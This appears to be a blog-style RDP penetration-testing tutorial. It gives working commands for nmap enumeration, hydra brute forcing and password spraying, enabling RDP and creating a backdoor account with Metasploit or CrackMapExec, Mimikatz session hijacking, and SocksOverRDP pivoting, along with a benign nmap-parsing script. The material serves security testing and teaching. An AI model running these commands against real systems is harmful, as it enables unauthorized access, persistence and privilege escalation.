Welcome. Today I am writing about the fundamentals of RDP penetration testing: how to enumerate the Remote Desktop Service, brute-force it, enable and connect to it after you already have a foothold, and how to hijack other users' RDP sessions to escalate privileges.
RDP Penetration Testing
Introduction
Enumerating RDP
The three nmap scripts below do different jobs: rdp-enum-encryption lists which security layers (CredSSP/NLA, TLS, native RDP) and encryption levels the server accepts, rdp-vuln-ms12-020 checks for the old MS12-020 denial-of-service/RCE bug (a different issue from BlueKeep), and rdp-ntlm-info pulls the NetBIOS/DNS hostname, domain name and OS build out of the NTLM challenge. If "Native RDP" is accepted, NLA is not enforced, which matters for both brute forcing and the older exploits.
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 192.168.1.131 -p3389
Brute Force RDP
hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp
Two caveats before running this against a domain-joined host: a full user-list times wordlist run will trip the account lockout policy, so on real engagements spray a single password (-p instead of -P) across the user list and wait out the lockout window between rounds; and RDP servers drop connections when hammered in parallel, so keep the task count low (-t 1 or -t 4), as hydra itself warns for the rdp module.
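Before deciding whether a brute-force or spray is worth it, it helps to read the nmap output from the enumeration step programmatically. The script below is an added example (it is not from the original post and not part of nmap or hydra): it parses the text that rdp-ntlm-info and rdp-enum-encryption print, extracts the hostname, domain and OS build, and reports whether the server still accepts the plain "Native RDP" security layer, i.e. whether NLA is not enforced. The scan output embedded in it is a constructed sample in nmap's format, not a real scan; the host and domain names in it are made up.

```shell
#!/bin/sh
# Added example: summarise nmap rdp-* script output before brute forcing.
# NMAP_SAMPLE is CONSTRUCTED sample text in the format the scripts emit;
# replace it with the real output of the nmap command from the post.

NMAP_SAMPLE='PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version: RDP 10.5 server
| rdp-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WS01
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: ws01.corp.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-03-01T10:00:00+00:00'

# rdp_field TEXT NAME: print the value of one "Name: value" line as printed
# by rdp-ntlm-info. Script lines start with "|" or "|_" and some spaces.
rdp_field() {
    printf '%s\n' "$1" | sed -n "s/^|_\{0,1\} *$2: //p" | head -n 1
}

# rdp_nla_enforced TEXT: "no" when rdp-enum-encryption reports that the
# server accepted the plain "Native RDP" security layer (no NLA needed to
# reach the login screen), "yes" when no such SUCCESS line is present.
rdp_nla_enforced() {
    if printf '%s\n' "$1" | grep -q '^| *Native RDP: SUCCESS'; then
        echo no
    else
        echo yes
    fi
}

# rdp_summary TEXT: one line with DNS host, NetBIOS domain, OS build and
# NLA status, handy for a quick triage table across many hosts.
rdp_summary() {
    printf '%s %s %s nla_enforced=%s\n' \
        "$(rdp_field "$1" DNS_Computer_Name)" \
        "$(rdp_field "$1" NetBIOS_Domain_Name)" \
        "$(rdp_field "$1" Product_Version)" \
        "$(rdp_nla_enforced "$1")"
}

# Stand-alone run: print the summary for the constructed sample.
rdp_summary "$NMAP_SAMPLE"
```

On a real scan, pipe `nmap -oN -` output (or a saved .nmap file) into a variable and call rdp_summary on it per host. A domain name that differs from the hostname tells you the box is domain-joined, so lockout policy applies; nla_enforced=yes means every connection must authenticate through CredSSP before the login screen appears, so tools that rely on the pre-NLA protocol path will not work.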
Post Exploitation
Metasploit
With a Meterpreter session on the target, the enable_rdp post module turns on Remote Desktop, opens the firewall for it and, when USERNAME and PASSWORD are set, creates a local account (added to the Remote Desktop Users group) you can log in with. The module path is post/windows/manage/enable_rdp (not "mange").
use post/windows/manage/enable_rdp
set username rfs
set password Password123!
set session 1
exploit
CrackMapExec
The same thing without a Meterpreter session, using local administrator credentials over SMB:
crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable
Connecting to RDP
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard
# Maps a folder on the attacking machine into the RDP session as a drive named "share" (here the windows-resources folder that ships with Kali), and enables clipboard redirection and dynamic resolution
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
Persistence
Credential Dumping
RDP Session Hijacking
Once you are SYSTEM on a host, you can attach your console to any other user's RDP session (including disconnected ones) without knowing their password. ts::sessions lists the sessions with their IDs, users and state; pick the ID of the session you want (a domain admin who left a disconnected session behind is the classic target) and pass it to ts::remote. token::elevate is needed first because switching sessions requires SYSTEM; the same effect can be had with the built-in tscon run as SYSTEM.
Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
Socks5 over RDP
https://github.com/nccgroup/SocksOverRDP
SocksOverRDP tunnels a SOCKS5 proxy through a dynamic virtual channel of an existing RDP connection, so you can pivot into the target's network without opening any extra ports. Note that it consists of a client-side plugin for the Windows RDP client (mstsc) plus a server executable that you run inside the RDP session, so it is driven from a Windows attack box rather than from xfreerdp.
RDP Exploits
Bluekeep
BlueKeep (CVE-2019-0708) is a pre-authentication remote code execution bug in the RDP service of older Windows versions (Windows 7 / Server 2008 R2 and earlier); it is not the same issue as the MS12-020 check in the nmap scan above, so a host that passes that check can still be vulnerable.